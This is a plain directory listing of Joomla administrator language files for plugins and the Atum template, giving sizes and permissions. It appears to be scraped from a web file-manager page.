plg_behaviour_versionable.ini File 329 B 0664
plg_behaviour_versionable.sys.ini File 329 B 0664
plg_captcha_recaptcha.ini File 2.31 KB 0664
plg_captcha_recaptcha.sys.ini File 724 B 0664
plg_captcha_recaptcha_invisible.ini File 2.53 KB 0664
plg_captcha_recaptcha_invisible.sys.ini File 556 B 0664
plg_content_confirmconsent.ini File 1.2 KB 0664
plg_content_confirmconsent.sys.ini File 389 B 0664
plg_content_contact.ini File 1 KB 0664
plg_content_contact.sys.ini File 385 B 0664
plg_content_emailcloak.ini File 521 B 0664
plg_content_emailcloak.sys.ini File 364 B 0664
plg_content_fields.ini File 767 B 0664
plg_content_fields.sys.ini File 443 B 0664
plg_content_finder.ini File 723 B 0664
plg_content_finder.sys.ini File 376 B 0664
plg_content_joomla.ini File 819 B 0664
plg_content_joomla.sys.ini File 398 B 0664
plg_content_loadmodule.ini File 946 B 0664
plg_content_loadmodule.sys.ini File 599 B 0664
plg_content_pagebreak.ini File 1.81 KB 0664
plg_content_pagebreak.sys.ini File 1.18 KB 0664
plg_content_pagenavigation.ini File 837 B 0664
plg_content_pagenavigation.sys.ini File 364 B 0664
plg_content_vote.ini File 645 B 0664
plg_content_vote.sys.ini File 302 B 0664
plg_editors-xtd_article.ini File 433 B 0664
plg_editors-xtd_article.sys.ini File 396 B 0664
plg_editors-xtd_contact.ini File 457 B 0664
plg_editors-xtd_contact.sys.ini File 408 B 0664
plg_editors-xtd_fields.ini File 649 B 0664
plg_editors-xtd_fields.sys.ini File 605 B 0664
plg_editors-xtd_image.ini File 489 B 0664
plg_editors-xtd_image.sys.ini File 419 B 0664
plg_editors-xtd_menu.ini File 439 B 0664
plg_editors-xtd_menu.sys.ini File 399 B 0664
plg_editors-xtd_module.ini File 417 B 0664
plg_editors-xtd_module.sys.ini File 383 B 0664
plg_editors-xtd_pagebreak.ini File 479 B 0664
plg_editors-xtd_pagebreak.sys.ini File 424 B 0664
plg_editors-xtd_readmore.ini File 589 B 0664
plg_editors-xtd_readmore.sys.ini File 377 B 0664
plg_editors_codemirror.ini File 2.41 KB 0664
plg_editors_codemirror.sys.ini File 322 B 0664
plg_editors_none.ini File 300 B 0664
plg_editors_none.sys.ini File 300 B 0664
plg_editors_tinymce.ini File 6.58 KB 0664
plg_editors_tinymce.sys.ini File 438 B 0664
plg_extension_finder.ini File 325 B 0664
plg_extension_finder.sys.ini File 325 B 0664
plg_extension_joomla.ini File 373 B 0664
plg_extension_joomla.sys.ini File 324 B 0664
plg_extension_namespacemap.ini File 563 B 0664
plg_extension_namespacemap.sys.ini File 563 B 0664
plg_fields_calendar.ini File 900 B 0664
plg_fields_calendar.sys.ini File 392 B 0664
plg_fields_checkboxes.ini File 619 B 0664
plg_fields_checkboxes.sys.ini File 400 B 0664
plg_fields_color.ini File 418 B 0664
plg_fields_color.sys.ini File 381 B 0664
plg_fields_editor.ini File 674 B 0664
plg_fields_editor.sys.ini File 384 B 0664
plg_fields_imagelist.ini File 755 B 0664
plg_fields_imagelist.sys.ini File 396 B 0664
plg_fields_integer.ini File 624 B 0664
plg_fields_integer.sys.ini File 388 B 0664
plg_fields_list.ini File 676 B 0664
plg_fields_list.sys.ini File 376 B 0664
plg_fields_media.ini File 620 B 0664
plg_fields_media.sys.ini File 380 B 0664
plg_fields_radio.ini File 681 B 0664
plg_fields_radio.sys.ini File 380 B 0664
plg_fields_sql.ini File 963 B 0664
plg_fields_sql.sys.ini File 372 B 0664
plg_fields_subform.ini File 881 B 0664
plg_fields_subform.sys.ini File 420 B 0664
plg_fields_text.ini File 524 B 0664
plg_fields_text.sys.ini File 376 B 0664
plg_fields_textarea.ini File 650 B 0664
plg_fields_textarea.sys.ini File 392 B 0664
plg_fields_url.ini File 545 B 0664
plg_fields_url.sys.ini File 372 B 0664
plg_fields_user.ini File 461 B 0664
plg_fields_user.sys.ini File 376 B 0664
plg_fields_usergrouplist.ini File 675 B 0664
plg_fields_usergrouplist.sys.ini File 412 B 0664
plg_filesystem_local.ini File 618 B 0664
plg_filesystem_local.sys.ini File 373 B 0664
plg_finder_categories.ini File 333 B 0664
plg_finder_categories.sys.ini File 375 B 0664
plg_finder_contacts.ini File 631 B 0664
plg_finder_contacts.sys.ini File 365 B 0664
plg_finder_content.ini File 635 B 0664
plg_finder_content.sys.ini File 473 B 0664
plg_finder_newsfeeds.ini File 442 B 0664
plg_finder_newsfeeds.sys.ini File 375 B 0664
plg_finder_tags.ini File 396 B 0664
plg_finder_tags.sys.ini File 341 B 0664
plg_installer_folderinstaller.ini File 519 B 0664
plg_installer_folderinstaller.sys.ini File 400 B 0664
plg_installer_override.ini File 739 B 0664
plg_installer_override.sys.ini File 393 B 0664
plg_installer_packageinstaller.ini File 1.16 KB 0664
plg_installer_packageinstaller.sys.ini File 395 B 0664
plg_installer_urlinstaller.ini File 415 B 0664
plg_installer_urlinstaller.sys.ini File 370 B 0664
plg_installer_webinstaller.ini File 1.31 KB 0664
plg_installer_webinstaller.sys.ini File 387 B 0664
plg_media-action_crop.ini File 819 B 0664
plg_media-action_crop.sys.ini File 318 B 0664
plg_media-action_resize.ini File 775 B 0664
plg_media-action_resize.sys.ini File 326 B 0664
plg_media-action_rotate.ini File 510 B 0664
plg_media-action_rotate.sys.ini File 331 B 0664
plg_multifactorauth_email.ini File 2.56 KB 0664
plg_multifactorauth_email.sys.ini File 399 B 0664
plg_multifactorauth_fixed.ini File 2.03 KB 0664
plg_multifactorauth_fixed.sys.ini File 590 B 0664
plg_multifactorauth_totp.ini File 2.43 KB 0664
plg_multifactorauth_totp.sys.ini File 611 B 0664
plg_multifactorauth_webauthn.ini File 2.87 KB 0664
plg_multifactorauth_webauthn.sys.ini File 577 B 0664
plg_multifactorauth_yubikey.ini File 2.04 KB 0664
plg_multifactorauth_yubikey.sys.ini File 675 B 0664
plg_privacy_actionlogs.ini File 367 B 0664
plg_privacy_actionlogs.sys.ini File 367 B 0664
plg_privacy_consents.ini File 379 B 0664
plg_privacy_consents.sys.ini File 379 B 0664
plg_privacy_contact.ini File 368 B 0664
plg_privacy_contact.sys.ini File 368 B 0664
plg_privacy_content.ini File 367 B 0664
plg_privacy_content.sys.ini File 367 B 0664
plg_privacy_message.ini File 379 B 0664
plg_privacy_message.sys.ini File 379 B 0664
plg_privacy_user.ini File 450 B 0664
plg_privacy_user.sys.ini File 364 B 0664
plg_quickicon_downloadkey.ini File 906 B 0664
plg_quickicon_downloadkey.sys.ini File 490 B 0664
plg_quickicon_eos.ini File 1.57 KB 0664
plg_quickicon_eos.sys.ini File 413 B 0664
plg_quickicon_extensionupdate.ini File 953 B 0664
plg_quickicon_extensionupdate.sys.ini File 453 B 0664
plg_quickicon_joomlaupdate.ini File 870 B 0664
plg_quickicon_joomlaupdate.sys.ini File 402 B 0664
plg_quickicon_overridecheck.ini File 1.08 KB 0664
plg_quickicon_overridecheck.sys.ini File 526 B 0664
plg_quickicon_phpversioncheck.ini File 2.16 KB 0664
plg_quickicon_phpversioncheck.sys.ini File 420 B 0664
plg_quickicon_privacycheck.ini File 1.04 KB 0664
plg_quickicon_privacycheck.sys.ini File 437 B 0664
plg_sampledata_blog.ini File 20.75 KB 0664
plg_sampledata_blog.sys.ini File 371 B 0664
plg_sampledata_multilang.ini File 3.28 KB 0664
plg_sampledata_multilang.sys.ini File 386 B 0664
plg_system_accessibility.ini File 1.63 KB 0664
plg_system_accessibility.sys.ini File 569 B 0664
plg_system_actionlogs.ini File 1.94 KB 0664
plg_system_actionlogs.sys.ini File 371 B 0664
plg_system_cache.ini File 903 B 0664
plg_system_cache.sys.ini File 293 B 0664
plg_system_debug.ini File 4.94 KB 0664
plg_system_debug.sys.ini File 366 B 0664
plg_system_fields.ini File 347 B 0664
plg_system_fields.sys.ini File 347 B 0664
plg_system_guidedtours.ini File 785 B 0664
plg_system_guidedtours.sys.ini File 320 B 0664
plg_system_highlight.ini File 328 B 0664
plg_system_highlight.sys.ini File 328 B 0664
plg_system_httpheaders.ini File 7.11 KB 0664
plg_system_httpheaders.sys.ini File 424 B 0664
plg_system_jooa11y.ini File 23.39 KB 0664
plg_system_jooa11y.sys.ini File 510 B 0664
plg_system_languagecode.ini File 927 B 0664
plg_system_languagecode.sys.ini File 386 B 0664
plg_system_languagefilter.ini File 1.69 KB 0664
plg_system_languagefilter.sys.ini File 365 B 0664
plg_system_log.ini File 364 B 0664
plg_system_log.sys.ini File 308 B 0664
plg_system_logout.ini File 510 B 0664
plg_system_logout.sys.ini File 421 B 0664
plg_system_logrotation.ini File 464 B 0664
plg_system_logrotation.sys.ini File 342 B 0664
plg_system_privacyconsent.ini File 4 KB 0664
plg_system_privacyconsent.sys.ini File 464 B 0664
plg_system_redirect.ini File 1.14 KB 0664
plg_system_redirect.sys.ini File 386 B 0664
plg_system_remember.ini File 391 B 0664
plg_system_remember.sys.ini File 313 B 0664
plg_system_schedulerunner.ini File 521 B 0664
plg_system_schedulerunner.sys.ini File 521 B 0664
plg_system_sef.ini File 661 B 0664
plg_system_sef.sys.ini File 371 B 0664
plg_system_sessiongc.ini File 1.63 KB 0664
plg_system_sessiongc.sys.ini File 407 B 0664
plg_system_shortcut.ini File 1.63 KB 0664
plg_system_shortcut.sys.ini File 1.08 KB 0664
plg_system_skipto.ini File 1.52 KB 0664
plg_system_skipto.sys.ini File 530 B 0664
plg_system_stats.ini File 1.98 KB 0664
plg_system_stats.sys.ini File 504 B 0664
plg_system_tasknotification.ini File 2.27 KB 0664
plg_system_tasknotification.sys.ini File 378 B 0664
plg_system_updatenotification.ini File 5.05 KB 0664
plg_system_updatenotification.sys.ini File 529 B 0664
plg_system_webauthn.ini File 6.6 KB 0664
plg_system_webauthn.sys.ini File 749 B 0664
plg_task_checkfiles.ini File 1.27 KB 0664
plg_task_checkfiles.sys.ini File 372 B 0664
plg_task_demotasks.ini File 1.27 KB 0664
plg_task_demotasks.sys.ini File 352 B 0664
plg_task_requests.ini File 1.19 KB 0664
plg_task_requests.sys.ini File 320 B 0664
plg_task_sitestatus.ini File 1.42 KB 0664
plg_task_sitestatus.sys.ini File 342 B 0664
plg_twofactorauth_totp.ini File 5.06 KB 0664
plg_twofactorauth_totp.sys.ini File 855 B 0664
plg_twofactorauth_yubikey.ini File 2.56 KB 0664
plg_twofactorauth_yubikey.sys.ini File 735 B 0664
plg_user_contactcreator.ini File 1003 B 0664
plg_user_contactcreator.sys.ini File 355 B 0664
plg_user_joomla.ini File 1.89 KB 0664
plg_user_joomla.sys.ini File 481 B 0664
plg_user_profile.ini File 1.97 KB 0664
plg_user_profile.sys.ini File 292 B 0664
plg_user_terms.ini File 1.22 KB 0664
plg_user_terms.sys.ini File 356 B 0664
plg_user_token.ini File 2.06 KB 0664
plg_user_token.sys.ini File 888 B 0664
plg_webservices_banners.ini File 341 B 0664
plg_webservices_banners.sys.ini File 341 B 0664
plg_webservices_config.ini File 338 B 0664
plg_webservices_config.sys.ini File 338 B 0664
plg_webservices_contact.ini File 342 B 0664
plg_webservices_contact.sys.ini File 342 B 0664
plg_webservices_content.ini File 342 B 0664
plg_webservices_content.sys.ini File 342 B 0664
plg_webservices_installer.ini File 350 B 0664
plg_webservices_installer.sys.ini File 350 B 0664
plg_webservices_languages.ini File 349 B 0664
plg_webservices_languages.sys.ini File 349 B 0664
plg_webservices_media.ini File 334 B 0664
plg_webservices_media.sys.ini File 334 B 0664
plg_webservices_menus.ini File 333 B 0664
plg_webservices_menus.sys.ini File 333 B 0664
plg_webservices_messages.ini File 345 B 0664
plg_webservices_messages.sys.ini File 345 B 0664
plg_webservices_modules.ini File 341 B 0664
plg_webservices_modules.sys.ini File 341 B 0664
plg_webservices_newsfeeds.ini File 349 B 0664
plg_webservices_newsfeeds.sys.ini File 349 B 0664
plg_webservices_plugins.ini File 341 B 0664
plg_webservices_plugins.sys.ini File 341 B 0664
plg_webservices_privacy.ini File 342 B 0664
plg_webservices_privacy.sys.ini File 342 B 0664
plg_webservices_redirect.ini File 346 B 0664
plg_webservices_redirect.sys.ini File 346 B 0664
plg_webservices_tags.ini File 329 B 0664
plg_webservices_tags.sys.ini File 329 B 0664
plg_webservices_templates.ini File 349 B 0664
plg_webservices_templates.sys.ini File 349 B 0664
plg_webservices_users.ini File 333 B 0664
plg_webservices_users.sys.ini File 333 B 0664
plg_workflow_featuring.ini File 765 B 0664
plg_workflow_featuring.sys.ini File 356 B 0664
plg_workflow_notification.ini File 1.51 KB 0664
plg_workflow_notification.sys.ini File 357 B 0664
plg_workflow_publishing.ini File 855 B 0664
plg_workflow_publishing.sys.ini File 359 B 0664
tpl_atum.ini File 1.45 KB 0664
tpl_atum.sys.ini File 821 B 0664
Filemanager